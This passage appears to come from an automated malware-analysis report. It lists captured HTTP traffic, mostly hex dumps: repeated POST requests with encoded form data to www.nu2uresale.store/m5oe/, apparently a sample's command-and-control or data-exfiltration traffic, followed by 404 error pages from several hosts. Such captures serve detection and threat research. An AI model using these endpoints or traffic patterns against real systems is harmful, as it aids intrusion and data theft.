35 30 30 4f 78 62 63 52 43 62 32 59 57 66 6b 41 6d 31 46 53 75 46 6f 49 31 39 6b 58 65 45 7a 4d 76 6c 5f 31 38 72 52 64 65 37 33 79 58 43 5a 47 45 45 78 76 69 62 52 32 6e 6e 34 71 6d 50 4f 58 70 43 78 6c 32 43 53 5a 42 78 49 64 58 4d 63 30 73 52 6c 4c 67 48 73 4e 36 48 73 45 50 78 31 48 50 6e 4b 37 6f 71 56 65 61 46 30 48 70 77 67 4a 43 78 69 37 61 36 66 32 56 51 47 37 59 54 6e 55 64 57 7a 52 2d 34 76 75 6d 4e 46 41 5f 54 73 61 4f 37 2d 59 47 33 30 65 6b 75 37 39 6b 69 57 30 4e 77 5f 47 33 4f 45 54 5f 61 45 6c 5a 4d 49 56 6
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.nu2uresale.storeConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.nu2uresale.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nu2uresale.store/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 5a 5f 57 38 68 71 47 6b 71 72 46 4f 59 48 65 6e 30 4b 79 63 64 5a 4e 49 56 7a 37 67 38 45 69 4b 56 70 48 48 6c 35 39 57 7e 57 7e 66 50 36 62 79 46 39 43 6c 66 66 62 55 71 58 66 6f 65 38 69 39 6b 56 65 74 69 6c 33 2d 53 6b 56 6c 61 52 6b 32 69 63 67 58 35 78 66 31 36 67 67 71 43 47 6f 5a 44 37 56 46 74 61 59 37 37 33 55 6f 30 78 6b 74 63 39 58 51 62 57 75 72 44 4c 4f 34 44 65 6a 6d 4d 2d 33 54 35 5a 49 65 44 64 41 65 79 33 5a 78 77 48 4a 6c 5a 64 69 55 42 67 6e 2d 4c 66 53 70 4c 46 6d 54 39 43 68 6a 4d 42 6e 76 30 6c 68 7a 42 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: l48xI=Z_W8hqGkqrFOYHen0KycdZNIVz7g8EiKVpHHl59W~W~fP6byF9ClffbUqXfoe8i9kVetil3-SkVlaRk2icgX5xf16ggqCGoZD7VFtaY773Uo0xktc9XQbWurDLO4DejmM-3T5ZIeDdAey3ZxwHJlZdiUBgn-LfSpLFmT9ChjMBnv0lhzBw).
      Source: global trafficHTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.nu2uresale.storeConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.nu2uresale.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nu2uresale.store/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 5a 5f 57 38 68 71 47 6b 71 72 46 4f 62 6b 32 6e 79 72 79 63 61 35 4e 4c 51 7a 37 67 72 55 6a 69 56 70 44 48 6c 34 35 47 7e 6b 79 66 50 72 4c 79 4c 34 65 6c 5a 66 62 55 73 58 65 67 51 63 69 72 6b 56 4c 55 69 6b 47 63 53 6e 35 6c 56 69 63 32 31 4d 67 49 78 78 66 30 37 67 67 70 4d 6d 6f 5a 44 37 70 5a 74 62 59 4e 37 33 63 6f 31 45 77 74 63 2d 28 58 5a 47 75 6d 65 62 4f 34 44 65 28 35 4d 2d 33 70 35 5a 41 30 44 65 49 65 39 42 31 78 78 57 4a 6b 4f 64 69 66 43 67 6d 61 4b 63 33 67 44 47 53 7a 77 44 38 47 46 45 61 5a 78 47 30 48 63 4f 64 71 62 57 4a 58 68 75 65 34 7e 66 66 61 30 74 33 70 78 4a 59 7a 61 67 64 47 43 39 4e 2d 41 4a 78 71 54 39 59 39 72 63 4e 45 65 6b 6c 70 73 58 64 41 56 76 53 4b 4c 5a 4c 38 41 5f 69 61 45 69 6f 6a 4d 45 49 68 52 55 71 61 32 79 73 77 72 6f 76 37 7a 49 6f 5a 39 31 49 6f 31 77 48 41 46 41 66 44 6e 6e 6f 35 58 7a 45 71 43 44 65 2d 37 65 42 4b 78 70 73 61 55 42 76 76 55 76 7a 66 71 65 71 45 6a 48 62 62 4c 4e 65 6c 55 34 79 66 49 54 64 48 58 74 42 4c 34 32 61 71 47 71 52 72 33 30 6f 55 61 63 67 6c 67 47 42 65 56 33 45 35 58 47 53 58 64 38 74 44 61 69 79 48 33 59 61 53 59 42 39 65 34 33 77 47 79 45 4a 33 52 50 6b 51 73 63 62 62 71 72 32 67 31 77 64 7a 33 46 7a 54 4e 53 64 73 70 69 34 34 65 79 70 6d 53 4a 31 33 4d 34 71 2d 48 43 77 52 4d 49 54 76 54 53 61 77 42 30 4b 54 31 52 46 46 4d 4c 66 5f 39 6e 4e 38 32 6d 4d 68 73 6b 4e 35 6f 32 55 4f 5a 56 65 7a 71 4c 39 70 56 49 48 6e 4f 74 65 38 53 38 6c 79 61 6b 38 44 50 57 61 4f 32 53 4b 6b 35 73 34 34 67 4f 52 6d 4e 43 79 5a 63 49 61 43 62 45 49 70 78 4d 71 49 6e 34 52 32 7e 4b 6c 64 74 63 7a 4e 52 75 70 6f 37 66 42 4e 43 4d 72 44 6d 71 42 53 6b 6c 71 56 50 4f 31 59 68 38 34 73 58 74 6a 32 58 47 28 71 33 74 36 41 6a 63 77 79 72 54 45 4f 44 64 6e 34 6e 65 72 5a 45 2d 4c 39 44 63 35 71 78 45 6c 34 43 2d 43 44 4a 43 33 76 57 6a 6b 4d 7a 64 64 30 35 34 6a 68 6a 79 30 76 42 6b 78 77 74 63 71 57 35 42 79 65 4c 4e 6a 51 30 44 55 68 6c 6b 57 56 74 64 4f 68 43 30 31 32 4b 55 54 78 4c 6f 44 46 32 6f 39 4e 79 57 49 56 39 61 5a 37 31 4b 5a 61 6b 31 45 64 34 32 32 61 31 6e 38 48 7a 65 34 4d 33 5f 56 48 73 36 39 62 63 67 53 73 6c 79 56 6b 67 4b 63 49 61 31 43 59 73 36 54 36 54 61 6c 4f 66 51 49 67 67 30 65 35 4d 69 49 62 52 44 59 79 79 6a 6d 37 45 74 72 70 6c 31 35 46 42 54 4c 5f 74 58 52 49 6d 71 78 6e 4d 57 49 32 67 73 70 4a 57 52 79 36 34 56 34 7a 69 48 61 58 56 71 54 56 54 43 4b 39 28 61 74 62 63 68 4e 4b 51 65 72 38 75 58 52 64 6f 34 34 6d 42 50 6f 34 5a 79 34 57 70 33 6b 2d 36 48 71 46 43 74 32 46 6a 46 56 64 41 55 43 67 47 74 31 5a 6a 52 66 38 42 4a 46 53 67 46 42 48 7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:30 GMTContent-Type: text/htmlContent-Length: 1277Connection: closeETag: "6373c172-4fd"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 2e 68 74 6d 6c 20 2d 20 41 4d 48 20 5b 4c 4e 4d 50 5d 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c e5 ae 8b e4 bd 93 3b 0d 0a 09 6d 61 72 67 69 6e 3a 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 37 30 70 78 20 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 34 46 36 46 37 44 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 36 46 36 46 36 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 38 37 41 30 41 37 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 20 7b 0d 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 09 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 20 0d 0a 09 63 6f 6c 6f 72 3a 23 37 36 39 38 41 37 3b 0d 0a 09 62 6c 72 3a 65 78 70 72 65 73 73 69 6f 6e 28 74 68 69 73 2e 6f 6e 46 6f 63 75 73 3d 74 68 69 73 2e 62 6c 75 72 28 29 29 3b 0d 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 70 72 65 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 35 25 3b 0d 0a 09 77 69 64 74 68 3a 38 32 25 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c e5 ae 8b e4 bd 93 3b 0d 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 39 70 78 20 73 6f 6c 69 64 20 23 45 37 45 46 46 31 3b 0d 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 30 70 78 20 35 70 78 20 72 67 62 61 28 31 30 30 2c 20 31 30 30 2c 20 31 30 30 2c 20 30 2e 33 29 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 0d 0a 09 5f 66 6f 6e 74 2d 73 69 7a 65 3a 39 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 35 25 3b 0d 0a 09 77 69 64 74 68 3a 38 32 25 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 39 31 39 31 39 31 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 42 4f 44 59 3e 0d 0a 0d 0a 3c 70 72 65 3e 0d 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 2e 68 74 6d 6c 3c 2f 68 31 3e 0d 0a e6 82 a8 e6 89 80 e8 ae bf e9 97
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:56:36 GMTServer: Apache/2.4.38 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:56:38 GMTServer: Apache/2.4.38 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:56:40 GMTServer: Apache/2.4.38 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:51 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: "afe-5db9230fabf0d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 